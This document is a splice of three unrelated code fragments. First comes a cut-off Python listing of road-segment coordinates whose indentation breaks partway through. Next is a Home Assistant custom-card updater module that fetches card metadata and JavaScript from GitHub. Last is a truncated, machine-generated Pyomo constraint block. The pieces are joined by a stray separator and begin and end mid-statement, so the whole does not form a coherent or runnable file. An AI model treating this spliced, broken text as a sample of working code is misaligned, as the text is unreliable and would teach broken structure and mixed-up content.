            [107.586959,-6.9154167],
            [107.5866376,-6.9153664],
            [107.5868307,-6.9147646],
            [107.5871445,-6.913798],
            [107.5879277,-6.9140909],
            [107.5883381,-6.9142986],
            [107.5885358,-6.9141388],
            [107.5882496,-6.9139285],
            [107.5878311,-6.9137395],
            [107.5876434,-6.9136915],
            [107.5872169,-6.9135105],
            [107.5871445,-6.913798],
            [107.5872169,-6.9135105],
            [107.5868736,-6.9133587],
            [107.5867851,-6.9136543],
            [107.5868092,-6.9137315],
            [107.5866376,-6.9145409],
        ]])
        # Segment 10
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5867739,-6.9160664],
            [107.5861222,-6.9159865],
            [107.5861651,-6.9159929],
            [107.5861503,-6.9157705],
            [107.5861288,-6.9152753],
        ]])
        # Segment 11
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5857367,-6.9126875],
            [107.5863523,-6.9130875],
            [107.5867492,-6.9133005],
            [107.5868736,-6.9133587],
            [107.5867546,-6.9133005],
            [107.5866473,-6.9135562],
            [107.5867546,-6.9132952],
            [107.5863523,-6.9130822],
            [107.5861162,-6.9132846],
            [107.5861377,-6.9135189],
            [107.5860411,-6.9135402],
            [107.5859285,-6.9148236],
            [107.5857783,-6.9148449],
            [107.585789,-6.9149887],
        ]])
def jalanKelurahanDungusCariang(self, nama):
self.jalan.record(nama)
self.jalan.line([[
[107.5767156,-6.9174426],
[107.5770075,-6.9174589],
[107.5770182,-6.9173577],
[107.5770075,-6.9174589],
[107.5780053,-6.917576],
[107.5781233,-6.9171447],
[107.5780053,-6.917576],
[107.5781286,-6.9175973],
[107.5787509,-6.9176825],
[107.5788689,-6.9176879],
[107.5789923,-6.9177305],
[107.580607,-6.9179169],
[107.5812024,-6.9180074],
[107.5820017,-6.9180926],
[107.5820178,-6.9178796],
[107.5820822,-6.9177092],
[107.5820178,-6.9178796],
[107.5820017,-6.9180926],
[107.5826938,-6.9181831],
[107.5830907,-6.9182417],
[107.5843996,-6.9183802],
[107.5850876,-6.9184706],
[107.5849951,-6.9184494],
[107.5850648,-6.9176399],
[107.5851589,-6.9176585],
[107.5850648,-6.9176399],
[107.5850809,-6.9172938],
[107.5844104,-6.9173257],
[107.5839222,-6.9172885],
[107.5844104,-6.9173257],
[107.5844265,-6.9170808],
[107.5844104,-6.9173257],
[107.5843996,-6.9183802],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5850809,-6.9172938],
[107.5851171,-6.9168794],
[107.58517,-6.9168998],
[107.5851171,-6.9168794],
[107.5851117,-6.9166984],
[107.5851861,-6.9167001],
[107.5851117,-6.9166984],
[107.5851225,-6.9165173],
[107.5851941,-6.916527],
[107.5851225,-6.9165173],
[107.5851332,-6.9163362],
[107.5851995,-6.9163513],
[107.5851332,-6.9163362],
[107.5851868,-6.9157025],
[107.5852236,-6.9157149],
[107.5843232,-6.9154256],
[107.5842749,-6.9155747],
[107.5842856,-6.9157025],
[107.5842749,-6.9155747],
[107.5843232,-6.9154256],
[107.5838725,-6.9152552],
[107.5838243,-6.9156812],
[107.5838296,-6.915596],
[107.5836687,-6.9155747],
[107.5836633,-6.9154416],
[107.5836204,-6.915399],
[107.5836687,-6.9151966],
[107.5838725,-6.9152552],
[107.5836687,-6.9151966],
[107.5835399,-6.9151806],
[107.583497,-6.915367],
[107.5834058,-6.915383],
[107.5833576,-6.9156013],
[107.5834058,-6.915383],
[107.583497,-6.915367],
[107.5835399,-6.9151806],
[107.5832878,-6.9150741],
[107.5834756,-6.9144138],
[107.5835882,-6.9139931],
[107.5836366,-6.9139975],
[107.5835882,-6.9139931],
[107.5830303,-6.9138653],
[107.5824724,-6.9137268],
[107.5824724,-6.9136576],
[107.5825368,-6.91337],
[107.5826173,-6.9131463],
[107.5827138,-6.9127842],
[107.5828587,-6.9123102],
[107.5830089,-6.9118842],
[107.5831913,-6.9115221],
[107.583239,-6.9115606],
[107.5831913,-6.9115221],
[107.5833844,-6.9110481],
[107.5834349,-6.9110762],
[107.5833844,-6.9110481],
[107.5826226,-6.9105635],
[107.5824402,-6.9109043],
[107.5826226,-6.9105635],
[107.5821613,-6.9102386],
[107.5821291,-6.9103398],
[107.5821184,-6.910654],
[107.5819789,-6.9108883],
[107.5819789,-6.9110747],
[107.5819789,-6.9108883],
[107.5821184,-6.910654],
[107.5821291,-6.9103398],
[107.5821613,-6.9102386],
[107.581657,-6.9099351],
[107.5815229,-6.9098446],
[107.5813566,-6.9101801],
[107.581244,-6.9105315],
[107.5813674,-6.9105688],
[107.581244,-6.9105315],
[107.5813566,-6.9101801],
[107.5815229,-6.9098446],
[107.5813888,-6.9096901],
[107.5811528,-6.9100097],
[107.5809811,-6.9103185],
[107.5810348,-6.9104037],
[107.5810026,-6.9104676],
[107.5806217,-6.9102173],
[107.5810079,-6.9096262],
[107.5810723,-6.9096262],
[107.5811313,-6.909525],
[107.5813888,-6.9096901],
[107.5811313,-6.909525],
[107.5807236,-6.9092907],
[107.5804983,-6.9091096],
[107.5801443,-6.9088807],
[107.5798814,-6.9087369],
[107.5790499,-6.9081351],
[107.5798814,-6.9087369],
[107.5798653,-6.9088487],
[107.5797419,-6.9088221],
[107.579581,-6.9087102],
[107.5793289,-6.9085451],
[107.5791519,-6.9084493],
[107.578889,-6.908428],
[107.5788085,-6.908412],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5788757,-6.9112659],
[107.5781462,-6.9110636],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5782803,-6.9117612],
[107.5780013,-6.9117026],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.576847,-6.9168861],
[107.5773318,-6.9169331],
[107.5774338,-6.9168479],
[107.5775947,-6.9164166],
[107.5776752,-6.9162408],
[107.5777663,-6.9157562],
[107.57782,-6.9154633],
[107.5772031,-6.9153408],
[107.57782,-6.9154633],
[107.5778736,-6.9154101],
[107.5782062,-6.915458],
[107.5785549,-6.9156124],
[107.5784798,-6.9159053],
[107.5781633,-6.9158468],
[107.5780507,-6.9158042],
[107.5777663,-6.9157562],
[107.5780507,-6.9158042],
[107.5781687,-6.9158468],
[107.5784798,-6.9159053],
[107.5784369,-6.9160544],
[107.5782277,-6.9160065],
[107.5784369,-6.9160544],
[107.578394,-6.9163154],
[107.5790324,-6.9164805],
[107.5791128,-6.9164059],
[107.5791718,-6.9162621],
[107.5791128,-6.9164059],
[107.5790324,-6.9164805],
[107.578394,-6.9163154],
[107.5782491,-6.9169065],
[107.5781286,-6.9175973],
[107.5787509,-6.9176825],
[107.5788689,-6.9176879],
[107.5789465,-6.9173006],
[107.5789519,-6.9170556],
[107.5782491,-6.9169065],
[107.5789519,-6.9170556],
[107.5789465,-6.9173006],
[107.5790377,-6.9171941],
[107.5793274,-6.9163527],
[107.5796546,-6.9164539],
[107.5796707,-6.9165391],
[107.5798907,-6.9166083],
[107.5799336,-6.9165178],
[107.5801213,-6.9165444],
[107.5806578,-6.9167254],
[107.5807597,-6.9165444],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5775873,-6.9136243],
[107.5787955,-6.9139343],
[107.5786346,-6.9142752],
[107.5784951,-6.914813],
[107.5779962,-6.9147385],
[107.5778736,-6.9154101],
[107.5782062,-6.915458],
[107.5784951,-6.914813],
[107.5784522,-6.9149089],
[107.5786453,-6.9149834],
[107.5785702,-6.9153136],
[107.5785112,-6.9155905],
[107.5785549,-6.9156124],
[107.5791362,-6.9156811],
[107.5793561,-6.9157317],
[107.579289,-6.9159607],
[107.5793561,-6.9157317],
[107.5795412,-6.915753],
[107.5793274,-6.9163527],
[107.5794634,-6.9159793],
[107.5802734,-6.9162056],
[107.5802224,-6.9163654],
[107.5801313,-6.9164133],
[107.5800991,-6.9165464],
[107.5801313,-6.9164133],
[107.5802224,-6.9163654],
[107.5802734,-6.9162056],
[107.580724,-6.9163521],
[107.5807616,-6.9160938],
[107.5808179,-6.9158435],
[107.5803941,-6.9157184],
[107.5803244,-6.9159394],
[107.5807616,-6.9160938],
[107.5803244,-6.9159394],
[107.5795412,-6.915753],
[107.579686,-6.9151405],
[107.5793936,-6.915058],
[107.5793695,-6.9151166],
[107.5791013,-6.9150553],
[107.5790423,-6.9152311],
[107.5791013,-6.9150553],
[107.5793695,-6.9151166],
[107.5792971,-6.9153722],
[107.5792408,-6.9154161],
[107.5791388,-6.9156811],
[107.5792408,-6.9154161],
[107.5785729,-6.915311],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5805838,-6.9179197],
[107.5806643,-6.917696],
[107.5807501,-6.917704],
[107.5808225,-6.9175176],
[107.5808252,-6.9174084],
[107.5808494,-6.9173445],
[107.5807635,-6.9173099],
[107.5810344,-6.9166682],
[107.5808157,-6.9164871],
[107.580821,-6.9163966],
[107.580724,-6.9163521],
[107.580821,-6.9163966],
[107.5810249,-6.9160664],
[107.5814219,-6.9162155],
[107.5812234,-6.9166469],
[107.5811697,-6.9167427],
[107.5810344,-6.9166682],
[107.5811697,-6.9167427],
[107.5812234,-6.9166469],
[107.5817705,-6.9169078],
[107.5818564,-6.9169078],
[107.5819958,-6.9169558],
[107.5820441,-6.9168386],
[107.5819958,-6.9169558],
[107.5822426,-6.9170303],
[107.5821729,-6.9172593],
[107.5822426,-6.9170303],
[107.5825055,-6.9171102],
[107.5828166,-6.9171475],
[107.5827361,-6.9177066],
[107.5826938,-6.9181831],
[107.5830907,-6.9182417],
[107.5831224,-6.9178877],
[107.5829829,-6.9178717],
[107.5829346,-6.9177705],
[107.5830634,-6.9168812],
[107.5831331,-6.9168066],
[107.5834496,-6.9168546],
[107.5837768,-6.9168919],
[107.5838144,-6.9169717],
[107.5837071,-6.9180634],
[107.5833745,-6.9180315],
[107.5833289,-6.9179503],
[107.5833316,-6.9179023],
[107.5831224,-6.9178877],
[107.5833316,-6.9179023],
[107.583455,-6.9168546],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5851107,-6.9168255],
[107.5844186,-6.9166924],
[107.5836247,-6.9165273],
[107.5833779,-6.9164634],
[107.5827449,-6.9164101],
[107.5827289,-6.9165273],
[107.582863,-6.9166125],
[107.5833833,-6.9166125],
[107.5835872,-6.9166604],
[107.5836247,-6.9165273],
[107.5844186,-6.9166924],
[107.5844669,-6.9163302],
[107.5846171,-6.9161012],
[107.5844669,-6.9163302],
[107.5837159,-6.9161598],
[107.5836408,-6.9161066],
[107.5834316,-6.9160746],
[107.5835764,-6.9154249],
[107.5836204,-6.915399],
[107.5835764,-6.9154249],
[107.5834316,-6.9160746],
[107.5833779,-6.9164634],
[107.5834316,-6.9160746],
[107.5830078,-6.9160001],
[107.5829059,-6.9160001],
[107.582525,-6.9158882],
[107.5824499,-6.9163462],
[107.5825481,-6.916367],
[107.5824499,-6.9163462],
[107.5822426,-6.9170303],
[107.5824499,-6.9163462],
[107.5819054,-6.9162051],
[107.5820422,-6.9157311],
[107.5820207,-6.9156992],
[107.5817042,-6.9156459],
[107.5816882,-6.915606],
[107.5816935,-6.9155421],
[107.5816399,-6.9154888],
[107.5816506,-6.9154356],
[107.5816962,-6.9152811],
[107.5816372,-6.9152172],
[107.5817203,-6.9147885],
[107.5820181,-6.914887],
[107.5820663,-6.9148657],
[107.5822541,-6.9149084],
[107.582187,-6.9152944],
[107.5822541,-6.9149084],
[107.5822863,-6.9147726],
[107.5825277,-6.9148444],
[107.5824901,-6.9150681],
[107.5825277,-6.9148444],
[107.5825786,-6.9148365],
[107.5825974,-6.9146075],
[107.5825786,-6.9148365],
[107.5830588,-6.9150015],
[107.583107,-6.9150042],
[107.5832116,-6.914674],
[107.583107,-6.9150042],
[107.5832878,-6.9150741],
[107.583107,-6.9150042],
[107.5830185,-6.9151187],
[107.58293,-6.9154888],
| |
"""Logic to handle custom_cards."""
import json
import os
from typing import IO, Any
import requests
from requests import RequestException
import yaml
from pyupdate.ha_custom import common
from pyupdate.log import Logger
class Loader(yaml.SafeLoader):
    """YAML Loader with `!include` constructor."""

    def __init__(self, stream: IO) -> None:
        """Remember the including file's directory so `!include` resolves relative paths."""
        try:
            root = os.path.split(stream.name)[0]
        except AttributeError:
            # Stream has no `name` attribute (e.g. an in-memory stream);
            # fall back to the current working directory.
            root = os.path.curdir
        self._root = root
        super().__init__(stream)
def construct_include(loader: Loader, node: yaml.Node) -> Any:
    """Include the file referenced at *node*.

    The path is resolved relative to the including file's directory
    (``loader._root``).  ``.yaml``/``.yml`` files are parsed with this same
    ``Loader`` (so nested ``!include`` tags keep working), ``.json`` files
    with :func:`json.load`, and any other extension is returned verbatim
    as text.
    """
    filename = os.path.abspath(
        os.path.join(loader._root, loader.construct_scalar(node)))
    extension = os.path.splitext(filename)[1].lstrip('.')

    with open(filename, 'r', encoding='utf-8', errors='ignore') as localfile:
        if extension in ('yaml', 'yml'):
            return yaml.load(localfile, Loader)
        if extension == 'json':
            return json.load(localfile)
        # Plain text: read() is equivalent to ''.join(readlines()) without
        # building an intermediate list.
        return localfile.read()
# Register the `!include` tag on our Loader so YAML files can embed others.
yaml.add_constructor('!include', construct_include, Loader)
class CustomCards():
"""Custom_cards class."""
def __init__(self, base_dir, mode, skip, custom_repos):
"""Init."""
self.base_dir = base_dir
self.mode = mode
self.skip = skip
self.log = Logger(self.__class__.__name__)
self.local_cards = []
self.super_custom_url = []
self.custom_repos = custom_repos
self.remote_info = None
self.resources = None
async def get_info_all_cards(self, force=False):
"""Return all remote info if any."""
await self.log.debug('get_info_all_cards', 'Started')
if not force and self.remote_info is not None:
await self.log.debug('get_info_all_cards', 'Using stored data')
return self.remote_info
remote_info = {}
allcustom = []
for url in self.custom_repos:
allcustom.append(url)
for url in self.super_custom_url:
allcustom.append(url)
repos = await common.get_repo_data('card', allcustom)
for url in repos:
try:
response = requests.get(url)
if response.status_code == 200:
for name, card in response.json().items():
try:
if name in remote_info:
entry = remote_info.get(name, {})
else:
entry = {}
for attr in card:
entry['name'] = name
entry[attr] = card[attr]
remote_info[name] = entry
except KeyError:
print('Could not get remote info for ' + name)
except RequestException:
print('Could not get remote info for ' + url)
self.remote_info = remote_info
stats = {'count': len(remote_info), 'cards': remote_info.keys()}
await self.log.debug(
'get_info_all_cards', 'Updated stored data ' + str(stats))
return remote_info
    async def init_local_data(self):
        """Init new version file.

        Seeds the local storage file with an entry (version + install dir)
        for every remote card that is also installed locally.
        """
        await self.log.debug('init_local_data', 'Started')
        if not self.local_cards:
            await self.localcards()
        remote = await self.get_info_all_cards()
        await self.super_custom()
        for card in remote:
            version, path = None, None
            if card in self.local_cards:
                current = await self.local_data(card, 'get')
                if 'version' not in current.keys():
                    await self.log.debug(
                        'init_local_data',
                        'Setting initial version for {}'.format(card))
                    # No stored version yet: record an empty string so the
                    # card reads as never-updated until upgraded.
                    version = ""
                await self.log.debug(
                    'init_local_data', 'Setting path for {}'.format(card))
                # force=True re-resolves the dir from the lovelace resources.
                path = await self.get_card_dir(card, True)
                await self.local_data(
                    name=card, action='set', version=version, localdir=path)
async def get_sensor_data(self):
"""Get sensor data."""
await self.log.debug('get_sensor_data', 'Started')
if not self.local_cards:
await self.localcards()
cards = await self.get_info_all_cards()
await self.log.debug(
'get_sensor_data', 'Number of cards: ' + str(len(cards.keys())))
await self.log.debug(
'get_sensor_data', 'Cards: ' + str(cards.keys()))
cahce_data = {}
cahce_data['domain'] = 'custom_cards'
cahce_data['has_update'] = []
count_updateable = 0
if cards:
for card in cards:
if card not in self.local_cards:
continue
remote_version = cards[card]['version']
local_version = await self.get_local_version(
cards[card]['name'])
has_update = (
remote_version and remote_version != local_version)
carddir = await self.get_card_dir(cards[card]['name'])
not_local = True if carddir is None else False
if (not not_local and remote_version):
if has_update and not not_local:
count_updateable = count_updateable + 1
cahce_data['has_update'].append(cards[card]['name'])
cahce_data[cards[card]['name']] = {
"local": local_version,
"remote": remote_version,
"has_update": has_update,
"not_local": not_local,
"repo": cards[card]['visit_repo'],
"change_log": cards[card]['changelog'],
}
await self.log.debug(
'get_sensor_data',
'get_sensor_data: [{}, {}]'.format(cahce_data, count_updateable))
return [cahce_data, count_updateable]
async def update_all(self):
"""Update all cards."""
await self.log.debug('update_all', 'Started')
updates = await self.get_sensor_data()
updates = updates[0]['has_update']
if updates is not None:
await self.log.info('update_all', updates)
for name in updates:
await self.upgrade_single(name)
await self.get_info_all_cards(force=True)
else:
await self.log.info('update_all', 'No updates avaiable')
async def force_reload(self):
"""Force data refresh."""
await self.log.debug('force_reload', 'Started')
if self.mode == 'storage':
self.resources = await self.storage_resources()
else:
self.resources = await self.yaml_resources()
await self.localcards()
await self.get_info_all_cards(True)
await self.super_custom()
await self.get_sensor_data()
async def upgrade_single(self, name):
"""Update one card."""
await self.log.info('upgrade_single', 'Started')
remote_info = await self.get_info_all_cards()
remote_info = remote_info[name]
remote_file = remote_info['remote_location']
local_file = await self.get_card_dir(name) + name + '.js'
await common.download_file(local_file, remote_file)
await self.upgrade_lib(name)
await self.upgrade_editor(name)
await self.update_resource_version(name)
await self.log.info('upgrade_single', 'Finished ' + name)
async def upgrade_lib(self, name):
"""Update one card-lib."""
await self.log.debug('upgrade_lib', 'Started')
remote_info = await self.get_info_all_cards()
remote_info = remote_info[name]
remote_file = remote_info['remote_location'][:-3] + '.lib.js'
local_file = await self.get_card_dir(name) + name + '.lib.js'
await common.download_file(local_file, remote_file)
async def upgrade_editor(self, name):
"""Update one card-editor."""
await self.log.debug('upgrade_editor', 'Started')
remote_info = await self.get_info_all_cards()
remote_info = remote_info[name]
remote_file = remote_info['remote_location'][:-3] + '-editor.js'
local_file = await self.get_card_dir(name) + name + '-editor.js'
await common.download_file(local_file, remote_file)
async def install(self, name):
"""Install single card."""
await self.log.debug('install', 'Started')
sdata = await self.get_sensor_data()
if name in sdata[0]:
await self.upgrade_single(name)
async def update_resource_version(self, name):
"""Update the ui-lovelace file."""
await self.log.debug('update_resource_version', 'Started')
remote_version = await self.get_info_all_cards()
remote_version = remote_version[name]['version']
await self.local_data(name, 'set', version=str(remote_version))
async def get_card_dir(self, name, force=False):
"""Get card dir."""
await self.log.debug('get_card_dir', 'Started')
card_dir = None
stored_dir = await self.local_data(name)
stored_dir = stored_dir.get('dir', None)
if stored_dir is not None and not force:
await self.log.debug(
'get_card_dir', 'Using stored data for {}'.format(name))
return stored_dir
if self.resources is None:
if self.mode == 'storage':
self.resources = await self.storage_resources()
else:
self.resources = await self.yaml_resources()
for entry in self.resources:
if entry['url'][:4] == 'http':
continue
entry_name = entry['url'].split('/')[-1].split('.js')[0]
if name == entry_name:
card_dir = entry['url']
break
if card_dir is None:
return None
if '/customcards/' in card_dir:
card_dir = card_dir.replace('/customcards/', '/www/')
if '/local/' in card_dir:
card_dir = card_dir.replace('/local/', '/www/')
stored_dir = "{}{}".format(
self.base_dir, card_dir).split(name + '.js')[0]
await self.local_data(name, action='set', localdir=stored_dir)
await self.log.debug('get_card_dir', stored_dir)
return stored_dir
async def get_local_version(self, name):
"""Return the local version if any."""
await self.log.debug('get_local_version', 'Started')
version = await self.local_data(name)
version = version.get('version')
await self.log.debug('get_local_version', version)
return version
async def get_remote_version(self, name):
"""Return the remote version if any."""
await self.log.debug('get_remote_version', 'Started')
version = await self.get_info_all_cards()
version = version.get(name, {}).get('version')
await self.log.debug('get_remote_version', version)
return version
async def local_data(
self, name=None, action='get', version=None, localdir=None):
"""Write or get info from storage."""
await self.log.debug('local_data', 'Started')
data = {'action': action,
'name': name,
'version': version,
'dir': localdir}
await self.log.debug('local_data', data)
returnvalue = None
jsonfile = "{}/.storage/custom_updater.cards".format(self.base_dir)
if os.path.isfile(jsonfile):
with open(jsonfile, encoding='utf-8',
errors='ignore') as storagefile:
try:
load = json.load(storagefile)
except Exception as error: # pylint: disable=W0703
load = {}
await self.log.error('local_data', error)
else:
load = {}
if action == 'get':
if name is None:
returnvalue = load
else:
returnvalue = load.get(name, {})
else:
card = load.get(name, {})
if version is not None:
card['version'] = version
if localdir is not None:
card['dir'] = localdir
load[name] = card
with open(jsonfile, 'w', encoding='utf-8',
errors='ignore') as outfile:
json.dump(load, outfile, indent=4)
outfile.close()
await self.log.debug('local_data', returnvalue)
return returnvalue
async def storage_resources(self):
"""Load resources from storage."""
await self.log.debug('storage_resources', 'Started')
resources = {}
jsonfile = "{}/.storage/lovelace".format(self.base_dir)
if os.path.isfile(jsonfile):
with open(jsonfile, encoding='utf-8',
errors='ignore') as localfile:
load = json.load(localfile)
resources = load['data']['config'].get('resources', {})
localfile.close()
else:
await self.log.error(
'storage_resources',
'Lovelace config in .storage file not found')
await self.log.debug('storage_resources', resources)
return resources
async def yaml_resources(self):
"""Load resources from yaml."""
await self.log.debug('yaml_resources', 'Started')
resources = {}
yamlfile = "{}/ui-lovelace.yaml".format(self.base_dir)
if os.path.isfile(yamlfile):
with open(yamlfile, encoding='utf-8',
errors='ignore') as localfile:
load = yaml.load(localfile, Loader)
resources = load.get('resources', {})
localfile.close()
else:
await self.log.error(
'yaml_resources', 'Lovelace config in yaml file not found')
await self.log.debug('yaml_resources', resources)
return resources
    async def localcards(self):
        """Scan the lovelace resources for locally served, tracked cards.

        Populates ``self.local_cards`` (card names) and
        ``self.super_custom_url`` (per-card metadata URLs discovered on
        GitHub raw content).
        """
        await self.log.debug('localcards', 'Started')
        await self.log.debug(
            'localcards', 'Getting local cards with mode: ' + self.mode)
        if not self.remote_info:
            await self.get_info_all_cards()
        local_cards = []
        super_custom_url = []
        if self.resources is None:
            if self.mode == 'storage':
                self.resources = await self.storage_resources()
            else:
                self.resources = await self.yaml_resources()
        for entry in self.resources:
            url = entry['url']
            # '?track=false' opts a resource out of tracking entirely.
            if '?track=false' in url or '?track=False' in url:
                continue
            # Remote (http...) resources are not local cards.
            if url[:4] == 'http':
                continue
            # GitHub-served cards with explicit '?track=true' get probed for
            # one of the known metadata filenames on the repo's master branch.
            if '/customcards/github' in url and (
                    '?track=true' in url or '?track=True' in url):
                remote_exist = False
                base = "https://raw.githubusercontent.com/"
                clean = url.split('/customcards/github/')[1].split('.js')[0]
                dev = clean.split('/')[0]
                card = clean.split('/')[1]
                base = base + "{}/{}/master/".format(dev, card)
                if card in self.remote_info:
                    remote_exist = True
                elif await common.check_remote_access(
                        base + 'custom_card.json'):
                    remote_exist = True
                    base = base + 'custom_card.json'
                elif await common.check_remote_access(base + 'tracker.json'):
                    remote_exist = True
                    base = base + 'tracker.json'
                elif await common.check_remote_access(base + 'updater.json'):
                    remote_exist = True
                    base = base + 'updater.json'
                elif await common.check_remote_access(
                        base + 'custom_updater.json'):
                    remote_exist = True
                    base = base + 'custom_updater.json'
                if remote_exist:
                    super_custom_url.append(base)
                    # Make sure the developer's download dir exists locally.
                    card_dir = self.base_dir + "/www/github/" + dev
                    os.makedirs(card_dir, exist_ok=True)
            # NOTE(review): appended for every non-http, tracked resource —
            # the card name is the resource filename without '.js'.
            local_cards.append(url.split('/')[-1].split('.js')[0])
        self.super_custom_url = super_custom_url
        self.local_cards = local_cards
        await self.log.debug('localcards', self.local_cards)
        await self.log.debug('localcards', self.super_custom_url)
async def super_custom(self):
"""Super custom stuff."""
for url in self.super_custom_url:
try:
if url.split('/master/')[0].split('/')[1] in self.remote_info:
card_dir = url.split('.com/')[1].split('/master')[0]
else:
response = requests.get(url)
if response.status_code | |
+ m.b405 <= 0)
# Machine-generated Pyomo model section (do not hand-edit beyond comments).
# c367-c421: linking constraints of the form  b_assign - b_indicator <= 0,
#   i.e. an assignment variable (b406-b460) may only be 1 when its group
#   indicator (m.b58 / m.b59 / m.b60) is 1.
# c422-c440: exactly-one constraints — each group of twenty assignment
#   variables (stride 20) must sum to 1.
m.c367 = Constraint(expr= - m.b58 + m.b406 <= 0)
m.c368 = Constraint(expr= - m.b58 + m.b407 <= 0)
m.c369 = Constraint(expr= - m.b58 + m.b408 <= 0)
m.c370 = Constraint(expr= - m.b58 + m.b409 <= 0)
m.c371 = Constraint(expr= - m.b58 + m.b410 <= 0)
m.c372 = Constraint(expr= - m.b58 + m.b411 <= 0)
m.c373 = Constraint(expr= - m.b58 + m.b412 <= 0)
m.c374 = Constraint(expr= - m.b58 + m.b413 <= 0)
m.c375 = Constraint(expr= - m.b58 + m.b414 <= 0)
m.c376 = Constraint(expr= - m.b58 + m.b415 <= 0)
m.c377 = Constraint(expr= - m.b58 + m.b416 <= 0)
m.c378 = Constraint(expr= - m.b58 + m.b417 <= 0)
m.c379 = Constraint(expr= - m.b58 + m.b418 <= 0)
m.c380 = Constraint(expr= - m.b58 + m.b419 <= 0)
m.c381 = Constraint(expr= - m.b58 + m.b420 <= 0)
m.c382 = Constraint(expr= - m.b59 + m.b421 <= 0)
m.c383 = Constraint(expr= - m.b59 + m.b422 <= 0)
m.c384 = Constraint(expr= - m.b59 + m.b423 <= 0)
m.c385 = Constraint(expr= - m.b59 + m.b424 <= 0)
m.c386 = Constraint(expr= - m.b59 + m.b425 <= 0)
m.c387 = Constraint(expr= - m.b59 + m.b426 <= 0)
m.c388 = Constraint(expr= - m.b59 + m.b427 <= 0)
m.c389 = Constraint(expr= - m.b59 + m.b428 <= 0)
m.c390 = Constraint(expr= - m.b59 + m.b429 <= 0)
m.c391 = Constraint(expr= - m.b59 + m.b430 <= 0)
m.c392 = Constraint(expr= - m.b59 + m.b431 <= 0)
m.c393 = Constraint(expr= - m.b59 + m.b432 <= 0)
m.c394 = Constraint(expr= - m.b59 + m.b433 <= 0)
m.c395 = Constraint(expr= - m.b59 + m.b434 <= 0)
m.c396 = Constraint(expr= - m.b59 + m.b435 <= 0)
m.c397 = Constraint(expr= - m.b59 + m.b436 <= 0)
m.c398 = Constraint(expr= - m.b59 + m.b437 <= 0)
m.c399 = Constraint(expr= - m.b59 + m.b438 <= 0)
m.c400 = Constraint(expr= - m.b59 + m.b439 <= 0)
m.c401 = Constraint(expr= - m.b59 + m.b440 <= 0)
m.c402 = Constraint(expr= - m.b60 + m.b441 <= 0)
m.c403 = Constraint(expr= - m.b60 + m.b442 <= 0)
m.c404 = Constraint(expr= - m.b60 + m.b443 <= 0)
m.c405 = Constraint(expr= - m.b60 + m.b444 <= 0)
m.c406 = Constraint(expr= - m.b60 + m.b445 <= 0)
m.c407 = Constraint(expr= - m.b60 + m.b446 <= 0)
m.c408 = Constraint(expr= - m.b60 + m.b447 <= 0)
m.c409 = Constraint(expr= - m.b60 + m.b448 <= 0)
m.c410 = Constraint(expr= - m.b60 + m.b449 <= 0)
m.c411 = Constraint(expr= - m.b60 + m.b450 <= 0)
m.c412 = Constraint(expr= - m.b60 + m.b451 <= 0)
m.c413 = Constraint(expr= - m.b60 + m.b452 <= 0)
m.c414 = Constraint(expr= - m.b60 + m.b453 <= 0)
m.c415 = Constraint(expr= - m.b60 + m.b454 <= 0)
m.c416 = Constraint(expr= - m.b60 + m.b455 <= 0)
m.c417 = Constraint(expr= - m.b60 + m.b456 <= 0)
m.c418 = Constraint(expr= - m.b60 + m.b457 <= 0)
m.c419 = Constraint(expr= - m.b60 + m.b458 <= 0)
m.c420 = Constraint(expr= - m.b60 + m.b459 <= 0)
m.c421 = Constraint(expr= - m.b60 + m.b460 <= 0)
m.c422 = Constraint(expr= m.b61 + m.b81 + m.b101 + m.b121 + m.b141 + m.b161 + m.b181 + m.b201 + m.b221 + m.b241
                          + m.b261 + m.b281 + m.b301 + m.b321 + m.b341 + m.b361 + m.b381 + m.b401 + m.b421 + m.b441
                          == 1)
m.c423 = Constraint(expr= m.b62 + m.b82 + m.b102 + m.b122 + m.b142 + m.b162 + m.b182 + m.b202 + m.b222 + m.b242
                          + m.b262 + m.b282 + m.b302 + m.b322 + m.b342 + m.b362 + m.b382 + m.b402 + m.b422 + m.b442
                          == 1)
m.c424 = Constraint(expr= m.b63 + m.b83 + m.b103 + m.b123 + m.b143 + m.b163 + m.b183 + m.b203 + m.b223 + m.b243
                          + m.b263 + m.b283 + m.b303 + m.b323 + m.b343 + m.b363 + m.b383 + m.b403 + m.b423 + m.b443
                          == 1)
m.c425 = Constraint(expr= m.b64 + m.b84 + m.b104 + m.b124 + m.b144 + m.b164 + m.b184 + m.b204 + m.b224 + m.b244
                          + m.b264 + m.b284 + m.b304 + m.b324 + m.b344 + m.b364 + m.b384 + m.b404 + m.b424 + m.b444
                          == 1)
m.c426 = Constraint(expr= m.b65 + m.b85 + m.b105 + m.b125 + m.b145 + m.b165 + m.b185 + m.b205 + m.b225 + m.b245
                          + m.b265 + m.b285 + m.b305 + m.b325 + m.b345 + m.b365 + m.b385 + m.b405 + m.b425 + m.b445
                          == 1)
m.c427 = Constraint(expr= m.b66 + m.b86 + m.b106 + m.b126 + m.b146 + m.b166 + m.b186 + m.b206 + m.b226 + m.b246
                          + m.b266 + m.b286 + m.b306 + m.b326 + m.b346 + m.b366 + m.b386 + m.b406 + m.b426 + m.b446
                          == 1)
m.c428 = Constraint(expr= m.b67 + m.b87 + m.b107 + m.b127 + m.b147 + m.b167 + m.b187 + m.b207 + m.b227 + m.b247
                          + m.b267 + m.b287 + m.b307 + m.b327 + m.b347 + m.b367 + m.b387 + m.b407 + m.b427 + m.b447
                          == 1)
m.c429 = Constraint(expr= m.b68 + m.b88 + m.b108 + m.b128 + m.b148 + m.b168 + m.b188 + m.b208 + m.b228 + m.b248
                          + m.b268 + m.b288 + m.b308 + m.b328 + m.b348 + m.b368 + m.b388 + m.b408 + m.b428 + m.b448
                          == 1)
m.c430 = Constraint(expr= m.b69 + m.b89 + m.b109 + m.b129 + m.b149 + m.b169 + m.b189 + m.b209 + m.b229 + m.b249
                          + m.b269 + m.b289 + m.b309 + m.b329 + m.b349 + m.b369 + m.b389 + m.b409 + m.b429 + m.b449
                          == 1)
m.c431 = Constraint(expr= m.b70 + m.b90 + m.b110 + m.b130 + m.b150 + m.b170 + m.b190 + m.b210 + m.b230 + m.b250
